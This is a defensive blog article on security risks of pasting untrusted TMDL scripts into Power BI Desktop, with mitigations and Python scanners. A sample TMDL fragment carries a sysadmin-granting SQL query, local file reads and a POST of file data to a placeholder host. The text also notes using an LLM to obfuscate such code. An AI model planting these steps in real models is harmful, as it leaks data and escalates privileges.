Power BI TMDL View: Benefits, Security Risks & Best Practices


The Tabular Model Definition Language (TMDL) is a text format for defining Power BI semantic models. Unlike the JSON-based Tabular Model Scripting Language (TMSL), TMDL uses a tab-indented, human-readable layout for tables, relationships, DAX measures, and the Power Query (M) code behind each partition.

Figure 1 – Example of TMDL format

Benefits of Using TMDL View

In January 2025, Microsoft introduced TMDL View in Power BI Desktop. It gives pro-code developers, who already work with semantic models from conventional programming languages, a code editor inside Desktop where TMDL can be pasted, edited, shared and reused; clicking the “Apply” button (see Figure 2) writes the script into the open model. If you have ever had to update a Power Query function across multiple semantic models or dataflows, you know how time-consuming that is, and by comparison this is a powerful feature.

Figure 2 – Updating your model in TMDL view with just the click of the ‘Apply’ button

This feature has led to the sharing of TMDL scripts on social media and the launch of sites like https://fabsnippets.com and the TMDL Gallery, where users exchange code and best practices. It highlights how active and generous the Power BI community is. 

However, with the introduction of TMDL View, I would caution the community about bad actors who might take advantage of that generosity.

Security Risks of TMDL Scripts

If you plan to use a TMDL script from another website or individual, treat it as untrusted code. Applying it runs Power Query (M) code, and potentially native SQL, Python or R, on your machine and under your credentials; that can leak data or change systems before you notice.

As of July 2025, I have identified several risks of running a TMDL script in TMDL View that you should consider beforehand, along with mitigation techniques that reduce the chance of a security breach.

SQL Injection via Native Queries

If you work with SQL-based sources, there is a good chance you have disabled the “Require user approval for new native database queries” setting (see Figure 3). It is a safety mechanism that is easy to turn off and forget about; when it is enabled, Power BI shows a prompt like the one in Figure 4 before a native query runs.

A TMDL script you apply in Power BI Desktop can therefore carry SQL, in a connector’s Query option, that you never meant to execute. You can think of this as a form of SQL injection within Power Query, though strictly it is arbitrary native query execution: nobody splices input into your query, the whole statement is theirs, and it runs against your database with the credentials you have saved for that source.

Figure 3 – Screenshot of disabling user approval for native database queries

What that SQL can do depends on the privileges of the saved connection. With a sufficiently privileged login it can extract sensitive data, change permissions, or create a user; with a read-only account it is limited to reading whatever that account can see.

Mitigation Technique

Turn on “Require user approval for new native database queries” before running the TMDL script in TMDL View. When this setting is enabled, you will see a message similar to Figure 4 before any native database query executes; the prompt shows the statement, so read it before you approve.

Figure 4 – Example of security prompt in Power BI desktop, prompting if you want to run a native SQL script

You should also inspect the Power Query code for database connection functions that accept a query, such as Sql.Database, Oracle.Database, PostgreSQL.Database and MySQL.Database (all via the Query option), Odbc.Query (the query is its second argument), and Value.NativeQuery, which runs a native query against any source that supports it. In each case the query text is what will execute against your database.

Python and R Execution Risks

You may not be aware that Python.Execute and R.Execute are gated by the same “Require user approval for new native database queries” setting. When it is enabled, Power BI prompts you to confirm before the script runs. I often see it disabled in the name of ‘psychological acceptability’, the design principle that a security mechanism should fit how people expect to work so that they do not bypass it; in practice, the expectation is often simply to avoid prompts altogether. If your Power BI Desktop files already use Python or R, a pasted script can run code you never intended to allow. A Python or R script runs under your user account on your machine and can read files, query the operating system, or send data elsewhere (see the example in Figure 5).

Figure 5 – Example of Python code in Power Query

Mitigation Technique

Turn on “Require user approval for new native database queries” before running the TMDL script in TMDL View, and inspect the Power Query code for any use of R.Execute or Python.Execute; the script to be run is the first argument of either function, so read it in full.

Privacy Settings and Data Leakage

If you see fastCombine under the model definition in a TMDL script (see Figure 6), inspect the script carefully: it is the model-level form of the “Always ignore Privacy Level settings” option. It switches off the privacy checks that normally stop data from one source being passed to another. That is convenient when combining data from a public website with internal data for analysis, but it also allows a script to read an Excel file and send its contents to a web service without any prompt.

Figure 6 – Example of fastCombine in TMDL Script

Mitigation Technique

Remove the fastCombine line from the script and make sure “Always combine data according to your Privacy Level settings for each source” is selected under Options > Global > Privacy (the Privacy Levels section) in Power BI Desktop. With that setting in place, you are asked to assign a privacy level to each source the first time they are combined; mark internal sources Private or Organizational and unknown endpoints Public, and the data privacy firewall will block combinations that would send private data to a public source.

Figure 7 – Set Privacy levels to the most restrictive before running an untrusted TMDL script

Web.Contents and External Data Transfers

Web.Contents is a powerful function that accesses websites and application programming interfaces, but it can also send data outside your organization. Figure 8 shows a TMDL script with a Web.Contents call that could upload data to an external endpoint. When the call includes the Content option, Power Query sends a POST request with that content as the body. The first time that endpoint is used on your machine, Power BI asks how to authenticate, and an anonymous connection is all an attacker’s collector needs.

Once the choice is stored, you will not be asked again until you clear the entry under ‘Data source settings’. Be cautious of look-alike domains, where the URL is crafted to resemble a legitimate site. For instance, powerbi.com is a legitimate Microsoft domain, but powerbì.com (with an accented ‘ì’) is not. The credential prompt shows the address, so read it character by character; otherwise you could believe you are connecting to a trusted site while in fact sending data to a malicious one.

Figure 8 – Example of Web.Contents performing a POST request

Mitigation Technique

Make sure “Always combine data according to your Privacy Level settings for each source” is selected under Options > Global > Privacy in Power BI Desktop, then inspect the TMDL script for Web.Contents and verify that each call is a legitimate data request to a domain you recognise. If the Content option is used, scrutinise it: an anonymous connection that sends data is highly suspicious. Keep in mind that privacy levels only intervene when data from one source flows into another; a POST whose body is hard-coded in the script never triggers a privacy prompt, so nothing but your review stands in its way.
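The look-alike-domain check described above, as an added example (my code, not the author’s and not part of Power BI): it pulls the URL literal out of each Web.Contents call in an M expression, converts the hostname to the ASCII (punycode) form that DNS actually resolves using Python’s standard idna codec, and flags any hostname that contains non-ASCII characters or mixes Unicode scripts within one label. The M snippet is constructed for the example, and the two flagged hostnames (powerbì.com, and a p‑a‑y‑p‑a‑l label whose first a is Cyrillic) are hypothetical look-alikes, not real sites.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# First string literal handed to Web.Contents, e.g. Web.Contents("https://...", [...]).
# Only catches URLs written as a plain literal; a URL assembled with Text.Combine
# or & is one more reason to read that step by hand.
WEB_CONTENTS_URL = re.compile(r'Web\.Contents\s*\(\s*"([^"]+)"')


def scripts_in(label: str) -> set:
    """Unicode scripts used by the letters in one hostname label, taken from the
    first word of each character's Unicode name (LATIN, CYRILLIC, GREEK, ...)."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def analyze_host(host: str) -> dict:
    """Describe a hostname the way a reviewer wants to see it: the punycode form
    the resolver uses, the scripts it draws on, and whether it could be a
    look-alike of an ASCII domain."""
    labels = host.split(".")
    try:
        punycode = host.encode("idna").decode("ascii")
    except UnicodeError:
        punycode = None  # not encodable as a DNS name at all; treat as hostile
    non_ascii = any(ord(ch) > 127 for ch in host)
    mixed_script = any(len(scripts_in(label)) > 1 for label in labels)
    return {
        "host": host,
        "punycode": punycode,
        "scripts": sorted(set().union(*(scripts_in(label) for label in labels))),
        "suspicious": non_ascii or mixed_script or punycode is None,
    }


def review_web_contents(m_script: str) -> list:
    """One finding per Web.Contents URL literal in an M expression."""
    findings = []
    for url in WEB_CONTENTS_URL.findall(m_script):
        host = urlsplit(url).hostname or ""
        findings.append({"url": url, **analyze_host(host)})
    return findings


# Constructed M expression for the example. The second and third hosts are
# hypothetical look-alikes: \u00ec is the accented i from the article, \u0430 is
# a Cyrillic small a that renders identically to a Latin a.
SAMPLE_M = (
    'let\n'
    '    Source = Web.Contents("https://api.powerbi.com/v1.0/myorg/groups"),\n'
    '    Upload = Web.Contents("https://powerb\u00ec.com/collect", [Content = Text.ToBinary("x")]),\n'
    '    Mixed  = Web.Contents("https://p\u0430ypal.example/submit")\n'
    'in\n'
    '    Upload\n'
)

if __name__ == "__main__":
    for f in review_web_contents(SAMPLE_M):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f'{flag:10} {f["host"]} -> {f["punycode"]} scripts={f["scripts"]}')
```

The punycode form is the useful output: a domain that reads as powerbì.com in the script shows up as an xn-- label, which no legitimate Microsoft endpoint would have. Mixed-script detection catches the cases an accent check misses, such as a Cyrillic letter dropped into an otherwise Latin name.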

Folder.Files and Local File Access

Folder.Files lists and reads every file under a folder on your machine, or on any share you can reach. In a script you did not write, it can quietly collect documents that have nothing to do with the model, and paired with Web.Contents it becomes an exfiltration path.

Figure 9 – Example of Folder.Files accessing a C Drive if executed

Mitigation Technique

Make sure “Always combine data according to your Privacy Level settings for each source” is selected under Options > Global > Privacy in Power BI Desktop. Inspect the TMDL script for Folder.Files (and Folder.Contents, which lists a folder the same way) and confirm that the path and its purpose are legitimate; a shared script rarely has a good reason to point at a user profile or a system directory.
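A script-level inventory of the functions discussed in the sections above, as an added example (my code, not the author’s and not a Microsoft tool): it scans a TMDL or bare M script for the native-query connectors, Python.Execute and R.Execute, Web.Contents with a Content option, Folder.Files, and a fastCombine line, and reports each with its line number and a severity. Beyond the page’s own list it also flags Expression.Evaluate, because M assembled at runtime is the simplest way to hide the other calls from a text search. The TMDL fragment, the server name and the URL it runs against are constructed for the example.

```python
import re

# Power Query (M) calls that deserve a second look in any TMDL script you did
# not write. Each rule: function-name pattern; an option that must appear inside
# the call for the first severity; severity with / without that option (None =
# not reported); and why it matters. Expression.Evaluate is an addition beyond
# the functions named in the article.
RULES = (
    (r"(?:Sql|Oracle|PostgreSQL|MySQL)\.Database", r"\bQuery\s*=", "high", None,
     "native query runs on the database with the saved connection's privileges"),
    (r"Odbc\.Query|Value\.NativeQuery", None, "high", "high",
     "native query runs on the database with the saved connection's privileges"),
    (r"Python\.Execute|R\.Execute", None, "high", "high",
     "arbitrary script runs on the machine refreshing the model"),
    (r"Web\.Contents", r"\bContent\s*=", "high", "info",
     "HTTP request; with a Content option it is a POST that can carry data out"),
    (r"Folder\.Files|Folder\.Contents", None, "medium", "medium",
     "reads the local file system"),
    (r"Expression\.Evaluate", None, "high", "high",
     "evaluates M assembled at runtime; hides what actually runs"),
)
# fastCombine sits on its own line in the model's dataAccessOptions block.
FAST_COMBINE = re.compile(r"^\s*fastCombine\s*$", re.MULTILINE)


def line_of(src: str, pos: int) -> int:
    return src.count("\n", 0, pos) + 1


def call_text(src: str, start: int) -> str:
    """Source text of the call whose name begins at `start`, through its closing
    parenthesis. Skips M string literals, in which a quote is escaped as "".
    Comments are not handled; a // comment containing parentheses would confuse it."""
    i = src.index("(", start)
    depth, j, n = 0, i, len(src)
    while j < n:
        ch = src[j]
        if ch == '"':
            j += 1
            while j < n:
                if src[j] == '"':
                    if j + 1 < n and src[j + 1] == '"':
                        j += 2          # "" inside a literal
                        continue
                    break               # closing quote
                j += 1
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[start:j + 1]
        j += 1
    return src[start:]                  # unbalanced; hand back the rest


def scan_tmdl(src: str) -> list:
    """Findings for a TMDL (or bare M) script, sorted by line."""
    findings = []
    for m in FAST_COMBINE.finditer(src):
        findings.append({"line": line_of(src, m.start()), "name": "fastCombine",
                         "severity": "high",
                         "reason": "model ignores privacy levels, so sources combine without a prompt"})
    for name_re, option_re, sev_with, sev_without, reason in RULES:
        for m in re.finditer(r"\b(" + name_re + r")\s*\(", src):
            call = call_text(src, m.start())
            has_option = bool(option_re and re.search(option_re, call))
            severity = sev_with if has_option else sev_without
            if severity is None:
                continue                # e.g. Sql.Database without a Query option
            findings.append({"line": line_of(src, m.start()), "name": m.group(1),
                             "severity": severity, "reason": reason,
                             "call": " ".join(call.split())[:120]})
    return sorted(findings, key=lambda f: f["line"])


# Constructed TMDL fragment for the example (layout approximates a model and a
# table definition; real TMDL is tab-indented). The partition's M expression
# carries one instance of each risk discussed above; srv.example and
# collect.example are placeholders.
SAMPLE_TMDL = r'''model Model
    culture: en-US
    dataAccessOptions
        fastCombine
        legacyRedirects

table Sales
    partition Sales = m
        mode: import
        source =
            let
                Source = Sql.Database("srv.example", "Sales",
                    [Query = "ALTER SERVER ROLE sysadmin ADD MEMBER [x]; SELECT 1 AS ok"]),
                Files = Folder.Files("C:\Users"),
                Post = Web.Contents("https://collect.example/upload",
                    [Content = Text.ToBinary(Text.Combine(Files[Name], ","))]),
                Script = Python.Execute("import os#(lf)print(os.environ)")
            in
                Source
'''

if __name__ == "__main__":
    for f in scan_tmdl(SAMPLE_TMDL):
        print(f'line {f["line"]:>3} {f["severity"]:6} {f["name"]}: {f["reason"]}')
```

Run it over a script before you press Apply. It is a text search, so a script that builds function names or URLs with Text.Combine, or assembles SQL from pieces, will slip past it; that is exactly why the approval and privacy prompts in Power BI Desktop should stay on as the last line of defence rather than being replaced by a scanner.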

Considerations

If you’re reading this and wondering how anyone could miss those risks in a script, the answer is obfuscation: hiding a code’s purpose by making it confusing or hard to read.

With Large Language Models (LLMs) like ChatGPT [1], it has become simple to obfuscate code or bury it among other steps. In Figure 10, I have highlighted a Web.Contents call hidden inside code that generates a Calendar/Date dimension. For Figure 11, I simply asked an LLM to hide the Python code that pulls files from a specific folder on the C drive. When a script is large or obfuscated, such code is easily overlooked.

Figure 10 – Example of Web.Contents placed between steps that build a Calendar/Date dimension table

Figure 11 – Example of Python code obfuscated

Hiding malicious code

It has never been easier to share Power BI scripts online, and it has never been easier to hide malicious behavior within them.

With the rise of large language models, anyone can generate long, realistic-looking Power Query scripts that include harmful code disguised among routine steps. Such a script might load a calendar table, sort data, or calculate metrics while quietly sending data to an unknown website or reading local files in the background.

What is especially concerning is that these steps can be hidden in plain sight. Obfuscated code can use misleading step names, redundant transformations, or string concatenation (including function names and URLs assembled at runtime) to mask its true purpose. With AI-generated scripts becoming common in developer forums and on social media, it is increasingly difficult to tell trusted code from tampered code at a glance.

Stay safe. Don’t assume a script is safe because it looks professional or comes from a well-meaning source. Review the steps carefully, especially those involving Web.Contents, Folder.Files, a native Query option, or Python.Execute and R.Execute.

If you are unsure what a complex script is doing, it can help to use a tool, or even a language model, to explain the code rather than write it. Asking for a plain-language summary of each step is often enough to surface suspicious behavior. Treat that summary as a pointer rather than a verdict, and still read the flagged steps yourself.

Conclusion

We have a strong community in Power BI, and TMDL View offers a huge benefit to improve your development processes. However, you should be cautious about running TMDL scripts you find online without first inspecting their contents. Doing so will help protect your data and safeguard the community from bad actors.

Did I miss any security considerations? Let me know in the comments.

[1] I used this simple prompt in ChatGPT: “Please obfuscate this Power Query Code denoted by ~~~ and remove comments”.


About the author

John Kerski has over a decade of experience in technical and government leadership. He specializes in managing Data Analytics projects and implementing DataOps principles to enhance solution delivery and minimize errors. John's expertise is showcased through his ability to offer patterns and templates that streamline the adoption of DataOps with Microsoft Fabric and Power BI. His in-depth knowledge and hands-on approach provide clients with practical tools to achieve efficient and effective data operations. Throughout his career, John has dedicated himself to helping Federal Agencies and private sector clients maximize their use of Microsoft products. His extensive experience and certifications with Microsoft solutions ensure that his clients receive a high rate of return on their investments.